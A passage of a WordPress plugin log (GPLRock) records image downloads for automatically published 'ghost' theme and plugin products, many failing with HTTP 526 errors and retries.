mccan-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:38:39 UTC] GPLRock: Image download failed for product mccan-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:41 UTC] GPLRock: Image download failed for product mccan-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mccan---portfolio-wordpress-theme-14540.webp for product mccan-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:38:43 UTC] GPLRock WARNING: Image download failed for product mccan-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mccan---portfolio-wordpress-theme-14540.webp [05-Apr-2026 07:38:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mccan-portfolio-wordpress-theme [05-Apr-2026 07:38:43 UTC] GPLRock: Image downloaded successfully for product solutech-security-cctv-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1e843aa6.webp [05-Apr-2026 07:38:43 UTC] GPLRock: Using pre-downloaded image for product solutech-security-cctv-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1e843aa6.webp [05-Apr-2026 07:38:43 UTC] GPLRock: Ghost product published with image - Product ID: solutech-security-cctv-wordpress-theme [05-Apr-2026 07:38:43 UTC] GPLRock: Image download failed for product patiotime-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:45 UTC] GPLRock: Image download failed for product patiotime-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/patiotime---restaurant-wordpress-theme-25021.webp for product patiotime-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:38:48 UTC] GPLRock: Image download failed for product patiotime-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:50 UTC] GPLRock: Image download failed for product patiotime-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:38:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/patiotime---restaurant-wordpress-theme-25021.webp for product patiotime-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:38:52 UTC] GPLRock WARNING: Image download failed for product patiotime-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/patiotime---restaurant-wordpress-theme-25021.webp [05-Apr-2026 07:38:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: patiotime-restaurant-wordpress-theme [05-Apr-2026 07:39:42 UTC] GPLRock: Image downloaded successfully for product build-a-rent-construction-equipment-rental-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8f184ec4.jpg [05-Apr-2026 07:39:42 UTC] GPLRock: Using pre-downloaded image for product build-a-rent-construction-equipment-rental-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8f184ec4.jpg [05-Apr-2026 07:39:42 UTC] GPLRock: Ghost product published with image - Product ID: build-a-rent-construction-equipment-rental-elementor-template-kit [05-Apr-2026 07:39:44 UTC] GPLRock: Image downloaded successfully for product bubup-kids-store-baby-shop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-27262597.jpg [05-Apr-2026 07:39:44 UTC] GPLRock: Using pre-downloaded image for product bubup-kids-store-baby-shop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-27262597.jpg [05-Apr-2026 07:39:44 UTC] GPLRock: Ghost product published with image - Product ID: bubup-kids-store-baby-shop-elementor-template-kit [05-Apr-2026 07:39:45 UTC] GPLRock: Image downloaded successfully for product brutal-creative-agency-advertising-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-49de43e0.jpg [05-Apr-2026 07:39:45 UTC] GPLRock: Using pre-downloaded image for product brutal-creative-agency-advertising-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-49de43e0.jpg [05-Apr-2026 07:39:45 UTC] GPLRock: Ghost product published with image - Product ID: brutal-creative-agency-advertising-service-elementor-template-kit [05-Apr-2026 07:39:46 UTC] GPLRock: Image downloaded successfully for product brooklyn-heights-private-villa-hotel-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-69662e77.webp [05-Apr-2026 07:39:46 UTC] GPLRock: Using pre-downloaded image for product brooklyn-heights-private-villa-hotel-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-69662e77.webp [05-Apr-2026 07:39:46 UTC] GPLRock: Ghost product published with image - Product ID: brooklyn-heights-private-villa-hotel-elementor-template-kit [05-Apr-2026 07:39:48 UTC] GPLRock: Image downloaded successfully for product brilo-construction-industry-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8e171bd8.webp [05-Apr-2026 07:39:48 UTC] GPLRock: Using pre-downloaded image for product brilo-construction-industry-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8e171bd8.webp [05-Apr-2026 07:39:48 UTC] GPLRock: Ghost product published with image - Product ID: brilo-construction-industry-elementor-template-kit [05-Apr-2026 07:39:49 UTC] GPLRock: Image downloaded successfully for product brandos-digital-marketing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1646f159.webp [05-Apr-2026 07:39:49 UTC] GPLRock: Using pre-downloaded image for product brandos-digital-marketing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1646f159.webp [05-Apr-2026 07:39:49 UTC] GPLRock: Ghost product published with image - Product ID: brandos-digital-marketing-elementor-template-kit [05-Apr-2026 07:39:51 UTC] GPLRock: Image downloaded successfully for product brandon-clara-wedding-event-invitation-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0a3075f7.webp [05-Apr-2026 07:39:51 UTC] GPLRock: Using pre-downloaded image for product brandon-clara-wedding-event-invitation-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0a3075f7.webp [05-Apr-2026 07:39:51 UTC] GPLRock: Ghost product published with image - Product ID: brandon-clara-wedding-event-invitation-elementor-template-kit [05-Apr-2026 07:39:52 UTC] GPLRock: Image downloaded successfully for product brandezy-branding-agency-creative-studio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7b933514.jpg [05-Apr-2026 07:39:52 UTC] GPLRock: Using pre-downloaded image for product brandezy-branding-agency-creative-studio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7b933514.jpg [05-Apr-2026 07:39:52 UTC] GPLRock: Ghost product published with image - Product ID: brandezy-branding-agency-creative-studio-elementor-template-kit [05-Apr-2026 07:39:54 UTC] GPLRock: Image downloaded successfully for product bonne-chiropractic-physiotherapy-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-28db167b.webp [05-Apr-2026 07:39:54 UTC] GPLRock: Using pre-downloaded image for product bonne-chiropractic-physiotherapy-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-28db167b.webp [05-Apr-2026 07:39:54 UTC] GPLRock: Ghost product published with image - Product ID: bonne-chiropractic-physiotherapy-elementor-template-kit [05-Apr-2026 07:39:55 UTC] GPLRock: Image downloaded successfully for product bonete-feminine-blog-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ff48f99e.webp [05-Apr-2026 07:39:55 UTC] GPLRock: Using pre-downloaded image for product bonete-feminine-blog-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ff48f99e.webp [05-Apr-2026 07:39:55 UTC] GPLRock: Ghost product published with image - Product ID: bonete-feminine-blog-elementor-template-kit [05-Apr-2026 07:41:50 UTC] GPLRock: Image download failed for product elitehost-webhosting-whmcs-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:41:52 UTC] GPLRock: Image download failed for product elitehost-webhosting-whmcs-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:41:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elitehost---webhosting--whmcs-wordpress-theme-11927.webp for product elitehost-webhosting-whmcs-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:41:55 UTC] GPLRock: Image download failed for product elitehost-webhosting-whmcs-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:41:57 UTC] GPLRock: Image download failed for product elitehost-webhosting-whmcs-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:41:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elitehost---webhosting--whmcs-wordpress-theme-11927.webp for product elitehost-webhosting-whmcs-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:41:59 UTC] GPLRock WARNING: Image download failed for product elitehost-webhosting-whmcs-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/elitehost---webhosting--whmcs-wordpress-theme-11927.webp [05-Apr-2026 07:41:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elitehost-webhosting-whmcs-wordpress-theme [05-Apr-2026 07:41:59 UTC] GPLRock: Image download failed for product crystalskull-gaming-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:42:01 UTC] GPLRock: Image download failed for product crystalskull-gaming-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:42:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crystalskull---gaming-magazine-wordpress-theme-24275.webp for product crystalskull-gaming-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:42:03 UTC] GPLRock: Image download failed for product crystalskull-gaming-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:51:58 UTC] GPLRock: Image downloaded successfully for product 66qrcode-ai-qr-codes-barcodes-generator-url-shortener-saas (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c69fbfb7.webp [05-Apr-2026 07:51:58 UTC] GPLRock: Using pre-downloaded image for product 66qrcode-ai-qr-codes-barcodes-generator-url-shortener-saas: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c69fbfb7.webp [05-Apr-2026 07:51:58 UTC] GPLRock: Ghost product published with image - Product ID: 66qrcode-ai-qr-codes-barcodes-generator-url-shortener-saas [05-Apr-2026 07:51:58 UTC] GPLRock: Image download failed for product super-elements-addons-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:52:00 UTC] GPLRock: Image download failed for product super-elements-addons-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:52:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/super-elements---addons-for-elementor-10569.webp for product super-elements-addons-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:52:03 UTC] GPLRock: Image download failed for product super-elements-addons-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:52:05 UTC] GPLRock: Image download failed for product super-elements-addons-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:52:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/super-elements---addons-for-elementor-10569.webp for product super-elements-addons-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:52:07 UTC] GPLRock WARNING: Image download failed for product super-elements-addons-for-elementor. URL: https://meldwp.com/wp-content/uploads/super-elements---addons-for-elementor-10569.webp [05-Apr-2026 07:52:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: super-elements-addons-for-elementor [05-Apr-2026 07:52:07 UTC] GPLRock: Image download failed for product mass-users-password-reset-pro-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:52:09 UTC] GPLRock: Image download failed for product mass-users-password-reset-pro-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:52:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mass-users-password-reset-pro-plugin-for-wordpress-6950.webp for product mass-users-password-reset-pro-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:52:11 UTC] GPLRock: Image download failed for product mass-users-password-reset-pro-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:52:13 UTC] GPLRock: Image download failed for product mass-users-password-reset-pro-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 07:52:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mass-users-password-reset-pro-plugin-for-wordpress-6950.webp for product mass-users-password-reset-pro-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 07:52:15 UTC] GPLRock WARNING: Image download failed for product mass-users-password-reset-pro-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/mass-users-password-reset-pro-plugin-for-wordpress-6950.webp [05-Apr-2026 07:52:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mass-users-password-reset-pro-plugin-for-wordpress [05-Apr-2026 07:52:16 UTC] GPLRock: Image download failed for product ultimate-wpbakery-page-builder-pricing-tables (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:02:13 UTC] GPLRock: Image downloaded successfully for product array-themes-transmit-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4557fa3b.jpg [05-Apr-2026 08:02:13 UTC] GPLRock: Using pre-downloaded image for product array-themes-transmit-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4557fa3b.jpg [05-Apr-2026 08:02:13 UTC] GPLRock: Ghost product published with image - Product ID: array-themes-transmit-wordpress-theme [05-Apr-2026 08:02:14 UTC] GPLRock: Image downloaded successfully for product envira-gallery-zip-importer-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8dac0b2e.jpg [05-Apr-2026 08:02:14 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-zip-importer-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8dac0b2e.jpg [05-Apr-2026 08:02:14 UTC] GPLRock: Ghost product published with image - Product ID: envira-gallery-zip-importer-addon [05-Apr-2026 08:02:16 UTC] GPLRock: Image downloaded successfully for product graph-paper-press-sell-media-mailchimp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-39e7262f.jpg [05-Apr-2026 08:02:16 UTC] GPLRock: Using pre-downloaded image for product graph-paper-press-sell-media-mailchimp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-39e7262f.jpg [05-Apr-2026 08:02:16 UTC] GPLRock: Ghost product published with image - Product ID: graph-paper-press-sell-media-mailchimp [05-Apr-2026 08:02:17 UTC] GPLRock: Image downloaded successfully for product woocommerce-instagram (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-14d765f5.jpg [05-Apr-2026 08:02:17 UTC] GPLRock: Using pre-downloaded image for product woocommerce-instagram: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-14d765f5.jpg [05-Apr-2026 08:02:17 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-instagram [05-Apr-2026 08:02:20 UTC] GPLRock: Image downloaded successfully for product yith-paypal-payouts-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d0ddb153.jpg [05-Apr-2026 08:02:20 UTC] GPLRock: Using pre-downloaded image for product yith-paypal-payouts-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d0ddb153.jpg [05-Apr-2026 08:02:20 UTC] GPLRock: Ghost product published with image - Product ID: yith-paypal-payouts-for-woocommerce [05-Apr-2026 08:02:22 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-quick-view-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8fbd5ca0.jpg [05-Apr-2026 08:02:22 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-quick-view-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8fbd5ca0.jpg [05-Apr-2026 08:02:22 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-quick-view-premium [05-Apr-2026 08:02:23 UTC] GPLRock: Image downloaded successfully for product elmastudio-waipoua-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-96ddd39a.jpg [05-Apr-2026 08:02:23 UTC] GPLRock: Using pre-downloaded image for product elmastudio-waipoua-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-96ddd39a.jpg [05-Apr-2026 08:02:23 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-waipoua-wordpress-theme [05-Apr-2026 08:02:25 UTC] GPLRock: Image downloaded successfully for product css-igniter-doberman-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fdfe0968.jpg [05-Apr-2026 08:02:25 UTC] GPLRock: Using pre-downloaded image for product css-igniter-doberman-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fdfe0968.jpg [05-Apr-2026 08:02:25 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-doberman-wordpress-theme [05-Apr-2026 08:02:27 UTC] GPLRock: Image downloaded successfully for product elmastudio-pukeko-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a69c75f5.jpg [05-Apr-2026 08:02:27 UTC] GPLRock: Using pre-downloaded image for product elmastudio-pukeko-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a69c75f5.jpg [05-Apr-2026 08:02:27 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-pukeko-wordpress-theme [05-Apr-2026 08:02:28 UTC] GPLRock: Image downloaded successfully for product woocommerce-frontend-manager-analytics (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e67c9d57.jpg [05-Apr-2026 08:02:28 UTC] GPLRock: Using pre-downloaded image for product woocommerce-frontend-manager-analytics: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e67c9d57.jpg [05-Apr-2026 08:02:28 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-frontend-manager-analytics [05-Apr-2026 08:03:16 UTC] GPLRock: Image download failed for product theguide-online-documentation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:18 UTC] GPLRock: Image download failed for product theguide-online-documentation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/theguide---online-documentation-wordpress-theme-3154.webp for product theguide-online-documentation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:03:20 UTC] GPLRock: Image download failed for product theguide-online-documentation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:22 UTC] GPLRock: Image download failed for product theguide-online-documentation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/theguide---online-documentation-wordpress-theme-3154.webp for product theguide-online-documentation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:03:24 UTC] GPLRock WARNING: Image download failed for product theguide-online-documentation-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/theguide---online-documentation-wordpress-theme-3154.webp [05-Apr-2026 08:03:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: theguide-online-documentation-wordpress-theme [05-Apr-2026 08:03:24 UTC] GPLRock: Image download failed for product rekko-ai-robotics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:26 UTC] GPLRock: Image download failed for product rekko-ai-robotics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rekko---ai--robotics-wordpress-theme-8870.webp for product rekko-ai-robotics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:03:29 UTC] GPLRock: Image download failed for product rekko-ai-robotics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:31 UTC] GPLRock: Image download failed for product rekko-ai-robotics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rekko---ai--robotics-wordpress-theme-8870.webp for product rekko-ai-robotics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:03:33 UTC] GPLRock WARNING: Image download failed for product rekko-ai-robotics-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/rekko---ai--robotics-wordpress-theme-8870.webp [05-Apr-2026 08:03:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rekko-ai-robotics-wordpress-theme [05-Apr-2026 08:03:33 UTC] GPLRock: Image download failed for product rosaa-flower-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:35 UTC] GPLRock: Image download failed for product rosaa-flower-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rosaa---flower-shop-wordpress-theme-28990.webp for product rosaa-flower-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:03:37 UTC] GPLRock: Image download failed for product rosaa-flower-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:39 UTC] GPLRock: Image download failed for product rosaa-flower-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rosaa---flower-shop-wordpress-theme-28990.webp for product rosaa-flower-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:03:42 UTC] GPLRock WARNING: Image download failed for product rosaa-flower-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/rosaa---flower-shop-wordpress-theme-28990.webp [05-Apr-2026 08:03:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rosaa-flower-shop-wordpress-theme [05-Apr-2026 08:03:42 UTC] GPLRock: Image download failed for product vg-rossi-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:44 UTC] GPLRock: Image download failed for product vg-rossi-responsive-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vg-rossi---responsive-woocommerce-wordpress-theme-30653.webp for product vg-rossi-responsive-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:03:46 UTC] GPLRock: Image download failed for product vg-rossi-responsive-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:48 UTC] GPLRock: Image download failed for product vg-rossi-responsive-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vg-rossi---responsive-woocommerce-wordpress-theme-30653.webp for product vg-rossi-responsive-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:03:50 UTC] GPLRock WARNING: Image download failed for product vg-rossi-responsive-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/vg-rossi---responsive-woocommerce-wordpress-theme-30653.webp [05-Apr-2026 08:03:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vg-rossi-responsive-woocommerce-wordpress-theme [05-Apr-2026 08:03:50 UTC] GPLRock: Image download failed for product pregnancy-medical-doctor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:53 UTC] GPLRock: Image download failed for product pregnancy-medical-doctor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pregnancy---medical-doctor-wordpress-theme-33583.webp for product pregnancy-medical-doctor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:03:55 UTC] GPLRock: Image download failed for product pregnancy-medical-doctor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:57 UTC] GPLRock: Image download failed for product pregnancy-medical-doctor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:03:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pregnancy---medical-doctor-wordpress-theme-33583.webp for product pregnancy-medical-doctor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:03:59 UTC] GPLRock WARNING: Image download failed for product pregnancy-medical-doctor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/pregnancy---medical-doctor-wordpress-theme-33583.webp [05-Apr-2026 08:03:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pregnancy-medical-doctor-wordpress-theme [05-Apr-2026 08:03:59 UTC] GPLRock: Image download failed for product gdn-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:01 UTC] GPLRock: Image download failed for product gdn-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gdn-magazine-theme-30493.webp for product gdn-magazine-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:04:03 UTC] GPLRock: Image download failed for product gdn-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:06 UTC] GPLRock: Image download failed for product gdn-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gdn-magazine-theme-30493.webp for product gdn-magazine-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:04:08 UTC] GPLRock WARNING: Image download failed for product gdn-magazine-theme. URL: https://meldwp.com/wp-content/uploads/gdn-magazine-theme-30493.webp [05-Apr-2026 08:04:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gdn-magazine-theme [05-Apr-2026 08:04:08 UTC] GPLRock: Image download failed for product cassida-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:10 UTC] GPLRock: Image download failed for product cassida-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cassida---hotel-booking-wordpress-theme-27252.webp for product cassida-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:04:12 UTC] GPLRock: Image download failed for product cassida-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:04:14 UTC] GPLRock: Image download failed for product cassida-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: 